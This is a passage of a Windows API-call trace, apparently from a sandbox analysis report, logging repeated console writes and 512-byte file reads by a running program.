(_FileHandle=1) returned 0x50 [0223.438] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] GetFileType (hFile=0x50) returned 0x1 [0223.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.439] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.440] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.440] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.440] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] GetFileType (hFile=0x50) returned 0x1 [0223.441] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.441] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.441] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.441] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.442] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] GetFileType (hFile=0x50) returned 0x1 [0223.442] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.442] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] GetFileType (hFile=0x50) returned 0x1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] GetFileType (hFile=0x50) returned 0x1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] GetFileType (hFile=0x50) returned 0x1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.443] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.443] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.443] GetFileType (hFile=0x50) returned 0x1 [0223.443] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] GetFileType (hFile=0x50) returned 0x1 [0223.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.444] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.445] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.445] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] GetFileType (hFile=0x50) returned 0x1 [0223.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.445] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.446] GetFileType (hFile=0x50) returned 0x1 [0223.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.447] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.447] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.447] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.447] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.447] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.447] GetFileType (hFile=0x50) returned 0x1 [0223.447] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.447] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.447] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.448] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.449] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.449] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.449] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.451] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.452] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.453] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, 